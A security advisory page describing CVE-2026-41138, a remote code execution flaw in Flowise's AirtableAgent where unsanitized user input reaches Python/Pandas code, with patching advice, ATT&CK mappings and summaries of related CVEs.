Flowise RCE: Unchecked Input Leads to Code Execution

/HIGH /CVSS 8.3/10
Written by SCW Vulnerability Desk Vulnerability Intelligence
SCW vulnerabilitycvehigh-severityremote-code-executioncwe-94
Flowise RCE: Unchecked Input Leads to Code Execution

The National Vulnerability Database has detailed CVE-2026-41138, a high-severity remote code execution (RCE) vulnerability in Flowise, a drag-and-drop UI for building custom large language model flows. Prior to version 3.1.0, the AirtableAgent.ts component fails to properly verify user input when leveraging Pandas.

This oversight allows user input to be directly inserted into the question parameter of a prompt template, which is then reflected into Python code without any sanitization. This direct injection creates a clear path for attackers to execute arbitrary code remotely. The National Vulnerability Database assigns a CVSSv3 score of 8.3 (High) to this flaw, underscoring its critical nature.

Flowise users must recognize that this isn’t just a theoretical vulnerability. It’s a direct code injection vector. Attackers leveraging this could completely compromise the underlying system hosting the Flowise application. The fix is available in version 3.1.0, making patching an immediate priority.

What This Means For You

  • If your organization uses Flowise, you need to verify your version immediately. This isn't a complex exploit; it's a straightforward remote code execution vulnerability stemming from unchecked input. Patch to version 3.1.0 or higher right now. If you're running an exposed instance, assume compromise and initiate incident response protocols.
🛡️ Am I exposed to this? Get detection rules for CVE-2026-41138 — Splunk, Sentinel, Elastic, QRadar & more

Related ATT&CK Techniques

T1190 Exploit Public-Facing Application Initial Access T1059.006 Python Execution

🛡️ Detection Rules

3 rules · 6 SIEM formats

3 detection rules auto-generated for this incident, mapped to MITRE ATT&CK. Sigma YAML is free — export to any SIEM format via the Intel Bot.

critical T1059.006 Execution

CVE-2026-41138 - Flowise AirtableAgent RCE via Pandas

Sigma YAML — free preview
✓ Sigma · Splunk SPL Sentinel KQL Elastic QRadar AQL Wazuh Get rules for your SIEM →

Indicators of Compromise

IDTypeIndicator
CVE-2026-41138 RCE Flowise < 3.1.0
CVE-2026-41138 RCE Vulnerable component: AirtableAgent.ts
CVE-2026-41138 RCE Vulnerable function: input applied to 'question' parameter within prompt template, reflected to Python code without sanitization

Written by SCW Vulnerability Desk

Source & Attribution
Source PlatformNVD
ChannelNational Vulnerability Database
PublishedApril 23, 2026 at 23:16 UTC

This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.

Believe this infringes your rights? Submit a takedown request.

Related Posts

CVE-2026-6732 — Libxml2 Denial of Service

CVE-2026-6732 — A flaw was found in libxml2. This vulnerability occurs when the library processes a specially crafted XML Schema Definition (XSD) validated document that...

vulnerabilityCVEmedium-severitydenial-of-servicecwe-843
/SCW Vulnerability Desk /MEDIUM /6.5 /⚑ 2 IOCs /⚙ 2 Sigma

OpenShell Mirror Mode Allows Arbitrary Code Execution

CVE-2026-41355 — OpenShell before 2026.3.28 contains an arbitrary code execution vulnerability in mirror mode that converts untrusted sandbox files into workspace hooks. Attackers with mirror...

vulnerabilityCVEhigh-severitycode-executioncwe-829
/SCW Vulnerability Desk /HIGH /7.3 /⚑ 4 IOCs /⚙ 3 Sigma

OpenClaw: High-Severity Access Control Bypass Looms

CVE-2026-41353 — OpenClaw before 2026.3.22 contains an access control bypass vulnerability in the allowProfiles feature that allows attackers to circumvent profile restrictions through persistent profile...

vulnerabilityCVEhigh-severitycwe-472
/SCW Vulnerability Desk /HIGH /8.1 /⚑ 4 IOCs /⚙ 2 Sigma